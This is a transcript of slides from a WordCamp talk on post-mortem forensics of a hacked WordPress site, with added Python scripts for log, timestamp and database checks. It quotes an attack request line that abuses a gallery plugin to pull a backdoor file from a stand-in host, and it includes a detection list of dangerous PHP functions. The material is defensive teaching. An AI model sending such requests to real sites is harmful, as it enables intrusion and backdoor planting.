Post Mortem of a Hacked Website - Wordcamp Sunshine Coast 2016
1. Post-Mortem of a
Hacked Website
Presented By: Tim Butler – Conetix
WordCamp Sunshine Coast 2016
Twitter: @timbutler
2. Who Am I?
Tim Butler
Enterprise Manager – Conetix
● 5 years in the hosting industry
● Previous - IT Security Manager within Federal Government
● Using WordPress since 2005
● Clean up 2-5 hacked websites a week
3. In this talk…
➔What happens when you’re hacked
➔Deep Analysis
➔Clean Up
➔Prevention
4. But before we start…
Prevention is better than the cure
Backup Backup Backup!
(and then take another backup)
6. How do you know if you’ve been hacked?
• Used to be simple (but annoying) defacing
• Poor site performance
• Emails bouncing
• Google was nice enough to let you know
8. Why was I hacked?
• You probably weren’t targeted specifically
• DoS attacks
• Phishing
• Spam
• Bot to hack other sites
9. Why was I hacked?
Google discovers over 100,000 infected sites
per month
100 billion estimated cost of cybercrime
10. So… I’ve been hacked
• Hackers want to have the system exploited
for as long as possible
• Many exploits avoid Google / Chrome to
remain undetected
• Obfuscated code
• Self morphing code
11. So… I’ve been hacked
Basically, it’s one big game of cat and mouse
Source: simpsons.wikia.com
17. Step1: Don’t Touch Anything
Treat it like a crime scene
You need to preserve the digital forensics
18. Step1: Don’t Touch Anything
• Webserver log files
• Server log files
• File timestamps
• Talk to your host!
The most important part is to find the point of origin
19. Step1: Don’t Touch Anything
If you need your website back up immediately,
restore your most recent backup to a new
hosting subscription and update DNS
25. Step 2: Forensic Analysis
Reality
• Lots of digging through log files
• Lots of cross-referencing file modification times
• Lots of low-level, tech work
27. Step 2: Forensic Analysis
Access Log Files
• First item to check
• Look for suspicious POST calls
• Looking for the result of the hack to start
with, not the cause
28. Step 2: Forensic Analysis
POST Calls
• Need to sort the good from the bad
grep POST access_log | wc -l
• 1,412 results
What to look for
Where to look for it
Quickly count the results
33. Step 2: Forensic Analysis
File Creation / Modification Times
• We know the malicious file is
wp-content/plugins/legit-looking/plugin/safefile.php
• Let’s look at the modification time:
ls -l safefile.php
-rw-r--r-- 1 fileowner filegroup 99424 Mar 23 2013 safefile.php
• Also check the creation time:
34. Step 2: Forensic Analysis
File Creation / Modification Times
• Also check the creation time:
ls -lc safefile.php
-rw-r--r-- 1 fileowner filegroup 99424 Apr 18 02:45 safefile.php
• Dates can be manipulated! Here’s where we need to search
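Added example (not from the talk): why both ls -l and ls -lc are worth checking. ls -l prints the modification time (mtime), which an attacker can set to any value with touch or utime; ls -lc prints the inode change time (ctime), which on Linux and macOS cannot be set from user space and moves to "now" whenever the file's metadata changes, including when mtime is rewound. The script below builds a placeholder file in a temporary directory (constructed, not the real sample), backdates its mtime to the 2013 date seen in the slides, and shows that the ctime gives the game away. The tolerance value and the file name are assumptions of the example.

```python
import os
import tempfile
from datetime import datetime, timezone

# Added example: constructed scenario in a temporary directory. mtime can be
# set to any value with touch/utime; on Linux and macOS the inode change time
# (ctime, what ls -lc shows) is updated by the kernel as a side effect and
# cannot be set by the caller, so a rewound mtime leaves a visible gap.

BACKDATED_TO = datetime(2013, 3, 23, tzinfo=timezone.utc).timestamp()


def backdate_mtime(path, when=BACKDATED_TO):
    """Rewind atime/mtime the way `touch -t` would; ctime moves to now."""
    os.utime(path, (when, when))


def timestamps(path):
    """Return the two times ls -l and ls -lc would print, as epoch seconds."""
    st = os.stat(path)
    return {"mtime": st.st_mtime, "ctime": st.st_ctime}


def looks_backdated(path, tolerance_seconds=60):
    """True when ctime is much newer than mtime. A file written long ago and
    left alone has the two within seconds of each other (assumed threshold)."""
    ts = timestamps(path)
    return ts["ctime"] - ts["mtime"] > tolerance_seconds


def demo():
    """Create a placeholder file, backdate it, and report what each check sees."""
    with tempfile.TemporaryDirectory() as d:
        path = os.path.join(d, "safefile.php")  # assumed name, mirrors the slide
        with open(path, "w") as f:
            f.write("<?php // constructed placeholder, not the real sample\n")
        flagged_before = looks_backdated(path)
        backdate_mtime(path)
        flagged_after = looks_backdated(path)
        return flagged_before, flagged_after, timestamps(path)


if __name__ == "__main__":
    before, after, ts = demo()
    print("flagged before backdating:", before)
    print("flagged after backdating:", after)
    for name, value in ts.items():
        print(name, datetime.fromtimestamp(value, timezone.utc).isoformat())
```

On a live incident run looks_backdated over the whole document root (os.walk) rather than one file; a cluster of files whose ctime sits within the same few minutes, regardless of what their mtime says, is usually the drop.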
35. Step 2: Forensic Analysis
Recheck Access Logs
grep -F "[18/Apr/2016:02:45" access_log
(-F matches the string literally; without it grep reads the leading [ as the start of a bracket expression and fails)
This may give us something like:
xxx.xxx.xxx.xxx - - [18/Apr/2016:02:45:00 +1000] "GET /wp-content/plugins/robo-gallery/includes/rbs_gallery_ajax.php?function=file_put_contents(%22http%3A%2F%2Fhackerssite%2Fscripts%2Fsafefile.php%22) HTTP/1.1" 200 449954 "-" "Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0"
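Added example (not from the talk) covering both slide 28 (sorting the good POST calls from the bad) and slide 35 (rechecking the access log around the file's ctime). The log sample is constructed: the 02:45:00 line is modelled on the request shown above, the other lines are ordinary WordPress traffic, and the IPs are documentation addresses. The list of "expected" POST endpoints and the list of PHP function names that should never appear in a query string are the example's own assumptions, not something the talk prescribes.

```python
import re
from collections import Counter
from datetime import datetime, timedelta, timezone
from urllib.parse import unquote

# Constructed sample of a combined-format access log (added example).
# The 02:45:00 line mirrors the request from the slides; the IPs are
# documentation addresses (RFC 5737), not real clients.
SAMPLE_LOG = """\
203.0.113.5 - - [18/Apr/2016:02:44:10 +1000] "POST /wp-login.php HTTP/1.1" 200 3471 "-" "Mozilla/5.0"
203.0.113.5 - - [18/Apr/2016:02:45:00 +1000] "GET /wp-content/plugins/robo-gallery/includes/rbs_gallery_ajax.php?function=file_put_contents(%22http%3A%2F%2Fhackerssite%2Fscripts%2Fsafefile.php%22) HTTP/1.1" 200 449954 "-" "Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0"
203.0.113.5 - - [18/Apr/2016:02:45:31 +1000] "POST /wp-content/plugins/legit-looking/plugin/safefile.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.7 - - [18/Apr/2016:09:12:03 +1000] "POST /wp-comments-post.php HTTP/1.1" 302 0 "http://example.com/hello-world/" "Mozilla/5.0"
198.51.100.8 - - [18/Apr/2016:09:30:45 +1000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 88 "http://example.com/wp-admin/" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# POST endpoints a stock WordPress install legitimately receives (assumed list).
EXPECTED_POST_PATHS = {
    "/wp-login.php", "/wp-comments-post.php", "/xmlrpc.php",
    "/wp-admin/admin-ajax.php", "/wp-admin/admin-post.php", "/wp-cron.php",
}

# PHP calls that have no business appearing inside a query string (assumed list).
DANGEROUS_CALL_RE = re.compile(
    r"\b(?:file_put_contents|file_get_contents|eval|base64_decode|system|exec"
    r"|shell_exec|passthru|assert)\s*\(",
    re.IGNORECASE,
)


def parse_log(text):
    """Turn raw log lines into dicts; lines that do not match are skipped."""
    entries = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        e = m.groupdict()
        e["time"] = datetime.strptime(e["ts"], "%d/%b/%Y:%H:%M:%S %z")
        e["path"] = e["target"].split("?", 1)[0]
        entries.append(e)
    return entries


def count_posts(entries):
    """Same number `grep POST access_log | wc -l` gives, minus false hits in other fields."""
    return sum(1 for e in entries if e["method"] == "POST")


def unexpected_post_paths(entries):
    """Sort the good from the bad: a POST to a PHP file outside the known
    WordPress endpoints, especially under wp-content, is where to start."""
    counts = Counter(e["path"] for e in entries if e["method"] == "POST")
    return sorted(p for p in counts if p not in EXPECTED_POST_PATHS)


def entries_near(entries, when, window_seconds=120):
    """Equivalent of grepping for the minute in the file's ctime, widened to a
    window in case the server clock and the log clock disagree slightly."""
    delta = timedelta(seconds=window_seconds)
    return [e for e in entries if abs(e["time"] - when) <= delta]


def suspicious_requests(entries):
    """Flag requests whose URL-decoded target carries a PHP function call."""
    return [e for e in entries if DANGEROUS_CALL_RE.search(unquote(e["target"]))]


def investigate(text, file_ctime):
    entries = parse_log(text)
    return {
        "posts": count_posts(entries),
        "odd_posts": unexpected_post_paths(entries),
        "near_ctime": [e["target"] for e in entries_near(entries, file_ctime)],
        "suspicious": [(e["ip"], e["path"]) for e in suspicious_requests(entries)],
    }


# ctime of the dropped file as reported by ls -lc in the slides (AEST, +10:00)
CTIME = datetime(2016, 4, 18, 2, 45, tzinfo=timezone(timedelta(hours=10)))

if __name__ == "__main__":
    for key, value in investigate(SAMPLE_LOG, CTIME).items():
        print(key, value)
```

The order of the checks follows the talk: the odd POST target points at the result of the hack (the dropped file being used), the window around the ctime points at the cause, and the decoded query string is what finally names the entry point. Decoding before matching matters; the literal log line contains %22 and %2F, so a plain grep for a quoted URL would miss it.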
40. Step 3: The Clean Up
• 10x as much work
If there are no backups…
• Hackers love to leave backdoors to regain
access
41. Step 3: The Clean Up
Remove infected files
• Malicious files
• Look for other files
They can modify every other file in your site
42. Step 3: The Clean Up
Check for Database changes
• Inserted users
• Updated passwords / privileges for non-admin users
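Added example (not from the talk) for the database checks on this slide. It builds an in-memory SQLite copy of the two WordPress tables that matter, wp_users and wp_usermeta, with constructed rows: one legitimate administrator, an editor whose capabilities were silently raised to administrator, and a user inserted a minute after the file drop. The default "wp_" table prefix, the known-good admin list and the compromise time are the example's assumptions; the serialized capability string is the format WordPress really stores.

```python
import sqlite3

# Added example with constructed data. Assumes the default "wp_" prefix;
# with another prefix both the table names and the meta_key change
# (e.g. "abc_capabilities").
KNOWN_ADMINS = {"tim"}                      # what the site owner says should exist
COMPROMISE_TIME = "2016-04-18 02:45:00"     # ctime of the dropped file (slide 34)

SCHEMA = """
CREATE TABLE wp_users (
    ID INTEGER PRIMARY KEY, user_login TEXT, user_email TEXT, user_registered TEXT);
CREATE TABLE wp_usermeta (
    umeta_id INTEGER PRIMARY KEY, user_id INTEGER, meta_key TEXT, meta_value TEXT);
"""

USERS = [
    (1, "tim", "tim@example.com", "2012-06-01 10:00:00"),
    (2, "editor", "editor@example.com", "2014-02-11 09:30:00"),
    (3, "wp_support", "nobody@example.net", "2016-04-18 02:46:12"),  # inserted user
]
USERMETA = [
    (1, 1, "wp_capabilities", 'a:1:{s:13:"administrator";b:1;}'),
    (2, 2, "wp_capabilities", 'a:1:{s:13:"administrator";b:1;}'),  # editor, escalated
    (3, 3, "wp_capabilities", 'a:1:{s:13:"administrator";b:1;}'),
]

# Everyone holding the administrator capability; runs unchanged on MySQL.
ADMIN_QUERY = """
SELECT u.ID, u.user_login, u.user_email, u.user_registered
FROM wp_users u JOIN wp_usermeta m ON m.user_id = u.ID
WHERE m.meta_key = 'wp_capabilities' AND m.meta_value LIKE '%"administrator"%'
ORDER BY u.ID
"""

RECENT_QUERY = """
SELECT ID, user_login, user_registered FROM wp_users
WHERE user_registered >= ? ORDER BY ID
"""


def build_db():
    """Load the constructed rows into an in-memory database."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    conn.executemany("INSERT INTO wp_users VALUES (?,?,?,?)", USERS)
    conn.executemany("INSERT INTO wp_usermeta VALUES (?,?,?,?)", USERMETA)
    return conn


def unexpected_admins(conn, known=KNOWN_ADMINS):
    """Administrators the owner did not create, whatever their registration date."""
    return [row for row in conn.execute(ADMIN_QUERY) if row[1] not in known]


def users_registered_since(conn, since=COMPROMISE_TIME):
    """Accounts created after the compromise; catches inserts but not escalations."""
    return list(conn.execute(RECENT_QUERY, (since,)))


def audit(conn):
    return {
        "unexpected_admins": [row[1] for row in unexpected_admins(conn)],
        "registered_since": [row[1] for row in users_registered_since(conn)],
    }


if __name__ == "__main__":
    for key, value in audit(build_db()).items():
        print(key, value)
```

The two queries deliberately overlap: the registration-date check alone misses the escalated editor, because that account is old and only its meta row changed, which is exactly the "updated privileges for non-admin users" case on the slide. Against the real site the same SQL can be run with wp-cli (wp db query) or phpMyAdmin; also compare the user_pass hashes of existing accounts with a pre-incident backup, since a reset password leaves no other trace in these tables.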
43. Step 3: The Clean Up
Cron Jobs
• Scheduled re-infections
• Check your web control panel / raw cron
44. Step 3: The Clean Up
RBL Blacklists
• If you were spamming, automated systems
notice
• Use an RBL lookup to check
- Senderbase (used by Telstra / Optus etc.) doesn’t
allow you to automate scans
- Nor do Hotmail / Outlook / Office365 / Google
50. Step 4: Prevention
Keep your software up-to-date
• One gotcha to be aware of:
Paid Themes with Plugins
- may not auto update
- may require an active subscription
• Remove (don’t just disable) unused themes / plugins
51. Step 4: Prevention
Secure Passwords
• Unique password per site / login
• Use a password manager
• Length is more important than complexity
(12+ characters is good)
53. Step 4: Prevention
Server / Hosting Protection
• CloudFlare Pro / Web Application Firewall
• Limit each site to one user
• Don’t keep old directories / backups on the
server